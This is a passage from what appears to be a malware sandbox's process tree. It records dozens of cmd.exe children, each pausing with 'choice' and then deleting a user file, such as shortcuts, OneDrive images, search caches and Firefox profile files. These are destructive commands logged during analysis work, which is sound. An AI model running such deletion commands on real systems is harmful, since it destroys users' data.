      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-400.png"
      4⤵
      PID:6044
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14436
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-100.png"
      4⤵
      PID:6056
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14848
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-125.png"
      4⤵
      PID:6076
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:1232
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-150.png"
      4⤵
      PID:6092
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:2636
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-200.png"
      4⤵
      PID:6108
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14596
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-400.png"
      4⤵
      PID:6128
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14352
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-100.png"
      4⤵
      PID:6140
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:544
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-125.png"
      4⤵
      PID:1448
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:4376
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-150.png"
      4⤵
      PID:5348
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15368
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-200.png"
      4⤵
      PID:4152
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14716
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-400.png"
      4⤵
      PID:5528
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:3672
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-100.png"
      4⤵
      PID:5204
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:1428
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-125.png"
      4⤵
      PID:5316
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14476
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-150.png"
      4⤵
      PID:6160
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14644
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-200.png"
      4⤵
      PID:6180
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16492
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-400.png"
      4⤵
      PID:6192
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:756
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-100.png"
      4⤵
      PID:6204
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:744
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-125.png"
      4⤵
      PID:6216
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14872
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-150.png"
      4⤵
      PID:6232
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15476
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-200.png"
      4⤵
      PID:6244
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14988
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-400.png"
      4⤵
      PID:6256
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:2740
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml"
      4⤵
      PID:6272
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14492
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk"
      4⤵
      PID:6284
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:764
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk"
      4⤵
      PID:6300
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15532
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk"
      4⤵
      PID:6312
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15568
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk"
      4⤵
      PID:6324
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:8
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Are.docx.lnk"
      4⤵
      PID:6336
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14888
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Files.docx.lnk"
      4⤵
      PID:6348
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16188
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Opened.docx.lnk"
      4⤵
      PID:6360
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14812
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Recently.docx.lnk"
      4⤵
      PID:6372
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14976
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\These.docx.lnk"
      4⤵
      PID:6384
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14368
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk"
      4⤵
      PID:6396
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14700
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk"
      4⤵
      PID:6408
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:2304
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\images\blurrect.png"
      4⤵
      PID:6424
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14708
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\1 - Desktop.lnk"
      4⤵
      PID:6444
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:3780
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\1 - Run.lnk"
      4⤵
      PID:6456
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16136
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\2 - Search.lnk"
      4⤵
      PID:6468
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:4456
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\3 - Windows Explorer.lnk"
      4⤵
      PID:6480
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14524
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\4 - Control Panel.lnk"
      4⤵
      PID:6496
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14500
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\5 - Task Manager.lnk"
      4⤵
      PID:6520
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14276
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\01 - Command Prompt.lnk"
      4⤵
      PID:6540
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14244
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\01a - Windows PowerShell.lnk"
      4⤵
      PID:6560
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16392
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\02 - Command Prompt.lnk"
      4⤵
      PID:6592
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15492
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\02a - Windows PowerShell.lnk"
      4⤵
      PID:6616
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14268
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\03 - Computer Management.lnk"
      4⤵
      PID:6636
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16060
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\04 - Disk Management.lnk"
      4⤵
      PID:6652
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:5084
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\04-1 - NetworkStatus.lnk"
      4⤵
      PID:6664
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15592
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\05 - Device Manager.lnk"
      4⤵
      PID:6688
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15064
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\06 - SystemAbout.lnk"
      4⤵
      PID:6708
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:4068
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\07 - Event Viewer.lnk"
      4⤵
      PID:6736
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15320
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\08 - PowerAndSleep.lnk"
      4⤵
      PID:6748
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14620
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\09 - Mobility Center.lnk"
      4⤵
      PID:6768
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:184
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\10 - AppsAndFeatures.lnk"
      4⤵
      PID:6800
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16160
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586085283434455.txt"
      4⤵
      PID:6820
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14896
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586085974792496.txt"
      4⤵
      PID:6840
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14920
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586086317073445.txt"
      4⤵
      PID:6852
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14588
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586086519152652.txt"
      4⤵
      PID:6864
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14252
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586086555234279.txt"
      4⤵
      PID:6876
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14944
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586086620185634.txt"
      4⤵
      PID:6900
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14660
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586086815225668.txt"
      4⤵
      PID:6920
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15576
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586086853243211.txt"
      4⤵
      PID:6936
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15272
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586088793491543.txt"
      4⤵
      PID:6968
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14764
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586092054450232.txt"
      4⤵
      PID:6988
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15632
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586092354938018.txt"
      4⤵
      PID:7008
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:736
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586092655135271.txt"
      4⤵
      PID:7028
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16168
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586093013592831.txt"
      4⤵
      PID:7096
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15404
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586093414998340.txt"
      4⤵
      PID:7116
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15508
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586093611520420.txt"
      4⤵
      PID:7140
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16408
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586094898087075.txt"
      4⤵
      PID:7156
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16308
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586095217155403.txt"
      4⤵
      PID:5708
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15584
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586095516139448.txt"
      4⤵
      PID:5448
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16300
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586096443529014.txt"
      4⤵
      PID:5136
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15000
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586137903496012.txt"
      4⤵
      PID:5520
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:2064
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt"
      4⤵
      PID:5944
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16524
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk"
      4⤵
      PID:5228
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16540
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qzr7kws6.default-release\AlternateServices.txt"
      4⤵
      PID:6072
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16532
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qzr7kws6.default-release\pkcs11.txt"
      4⤵
      PID:5280
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15468
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qzr7kws6.default-release\SiteSecurityServiceState.txt"
      4⤵
      PID:5368
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:13912
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\LT2C7GL0\known_providers_download_v1[1].xml"
      4⤵
      PID:5724
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14344
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\LT2C7GL0\update100[1].xml"
      4⤵
      PID:5512
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:13996
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\squaretile.png"
      4⤵
      PID:112
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16144
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\tinytile.png"
      4⤵
      PID:6136
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:4724
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\squaretile.png"
      4⤵
      PID:5688
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16280
  - - C:\Windows\SYSTEM32\cmd.exe
